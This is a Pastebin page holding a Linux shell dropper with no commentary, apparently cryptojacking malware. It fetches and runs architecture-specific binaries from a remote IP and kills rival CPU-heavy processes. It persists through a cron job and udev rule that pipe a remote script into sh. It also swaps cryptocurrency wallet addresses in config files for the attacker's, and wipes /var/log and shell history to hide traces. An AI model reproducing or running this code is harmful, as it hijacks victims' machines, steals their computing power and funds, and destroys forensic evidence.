Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- curl -sk https://fulminare.top
- #!/bin/sh
- ARCH=$(uname -m)
- FILE=$(head -c 32 /dev/urandom | tr -dc 'A-Za-z0-9' | head -c 8 2>/dev/null) || FILE=$(head -c 32 /dev/urandom | awk '{ for(i=1; i<=length($0); i++) if (substr($0, i, 1) ~ /[A-Za-z0-9]/) printf "%s", substr($0, i, 1); }' | head -c 8 2>/dev/null)
- if ([ "$(grep -c 4E1F /proc/net/tcp)" -eq 0 ] >/dev/null 2>&1) || [ "$(sockstat | grep 19999 | wc -l)" -eq 0 ]; then
- EXEC=$(for i in $(mount | grep -awv noexec | grep -aw "rw" | awk '{print $3}'); do find $i -maxdepth 0 -type d -executable 2>/dev/null; done)
- (ps -eo pid,%cpu --sort=-%cpu | awk '$2 > 50 {print $1}' | xargs -I % kill -9 %) >/dev/null 2>&1
- if [ "$ARCH" = "x86_64" ]; then
- for i in /tmp $PWD $HOME $EXEC; do
- (curl -sk http://77.110.110.55/1 -o "$i"/"$FILE" || wget --no-check-certificate -qO "$i"/"$FILE" http://77.110.110.55/1) >/dev/null 2>&1
- (cd "$i" ; chmod +x "$FILE" ; ./"$FILE") >/dev/null 2>&1
- rm -rf "$i"/"$FILE" >/dev/null 2>&1
- sleep 15
- if [ "$(grep -c ":4E1F" /proc/net/tcp)" -gt 0 ]; then
- break
- fi
- done
- elif [ "$ARCH" = "aarch64" ]; then
- for i in /tmp $PWD $HOME $EXEC; do
- (curl -sk http://77.110.110.55/2 -o "$i"/"$FILE" || wget --no-check-certificate -qO "$i"/"$FILE" http://77.110.110.55/2) >/dev/null 2>&1
- (cd "$i" ; chmod +x "$FILE" >/dev/null 2>&1 ; ./"$FILE") >/dev/null 2>&1
- rm -rf "$i"/"$FILE" >/dev/null 2>&1
- sleep 15
- if [ "$(grep -c 4E1F /proc/net/tcp)" -gt 0 ]; then
- break
- fi
- done
- elif [ "$ARCH" = "amd64" ]; then
- for i in /tmp $PWD $HOME $EXEC; do
- (curl -sk http://77.110.110.55/3 -o "$i"/support || wget --no-check-certificate -qO "$i"/support http://77.110.110.55/3) >/dev/null 2>&1
- (cd "$i" ; chmod +x support >/dev/null 2>&1 ; ./support) >/dev/null 2>&1
- rm -rf "$i"/support >/dev/null 2>&1
- sleep 15
- if [ "$(sockstat | grep 19999 | wc -l)" -gt 0 ]; then
- break
- fi
- done
- else
- exit 1
- fi
- fi
- (if sudo -n true; then find /etc/cron.d -type f -exec rm -rf {} \; ; elif [ "$(id -u)" -eq 0 ]; then find /etc/cron.d -type f -exec rm -rf {} \; ; fi) >/dev/null 2>&1
- (if sudo -n true; then echo 0 0 \* \* \* root sh -c "\"(curl -sk https://fulminare.top || wget --no-check-certificate -qO - https://fulminare.top) | sh"\" | sudo tee /etc/cron.d/mdadm; elif [ "$(id -u)" -eq 0 ]; then echo 0 0 \* \* \* root sh -c "\"(curl -sk https://fulminare.top || wget --no-check-certificate -qO - https://fulminare.top) | sh"\" | tee /etc/cron.d/mdadm; fi) >/dev/null 2>&1
- UDEV='SUBSYSTEM=="net", KERNEL!="lo", RUN+="echo 0 0 \* \* \* root sh -c "\"(curl -sk https://fulminare.top || wget --no-check-certificate -qO - https://fulminare.top) | sh"\" | (sudo tee /etc/cron.d/mdadm || tee /etc/cron.d/mdadm)"'
- (if sudo -n true; then echo $UDEV | sudo tee /etc/udev/rules.d/mdadm; elif [ "$(id -u)" -eq 0 ]; then echo $UDEV | tee /etc/udev/rules.d/mdadm; fi) >/dev/null 2>&1
- (find /tmp $PWD $HOME $EXEC -type f \( -name "*.conf" -o -name "*.json" \) -exec sed -E -i 's/([^0-9]|^)([48][A-Za-z0-9]{94})([^0-9]|$)/\18BNAseW8ommRmYoGKeRZ9pLG98pudVRTWCSRZ2xfDPAdFhTfopG53uDe5yTYxUupXLi3UZt77dG21PuNWYT7i1QVFdQyT1Y\3/g' {} +) >/dev/null 2>&1
- (if sudo -n true; then for logs in $(sudo find /var/log -type f); do sudo rm $logs; done; elif [ "$(id -u)" -eq 0 ]; then for logs in $(find /var/log -type f); do rm $logs; done; fi) >/dev/null 2>&1
- (rm $HOME/.bash_history) >/dev/null 2>&1
- (history -c) >/dev/null 2>&1
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement